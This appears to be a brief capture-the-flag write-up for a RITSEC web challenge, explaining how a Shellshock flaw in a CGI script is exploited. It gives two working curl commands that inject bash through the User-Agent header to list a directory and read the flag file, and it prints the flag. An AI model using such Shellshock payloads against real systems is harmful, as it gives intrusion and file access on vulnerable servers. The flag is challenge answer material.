This dog is shockingly cute!
fun.ritsec.club:8008
Author: sandw1ch
From the start of the challenge, the hint points us to a vulnerability: Shellshock
There's a vulnerable CGI service running at /cgi-bin/stats
Using the following command, we can obtain RCE:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cd /var/www/;ls -la;'" http://fun.ritsec.club:8008/cgi-bin/stats
After searching through the machine, we find the flag in the /opt/flag.txt
file, and we can retireve it with the following command:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /opt/flag.txt'" http://fun.ritsec.club:8008/cgi-bin/stats
.
The flag is RITSEC{sh3ll_sh0cked_w0wz3rs}
In my opinion, this was the easiest web challenge in this CTF.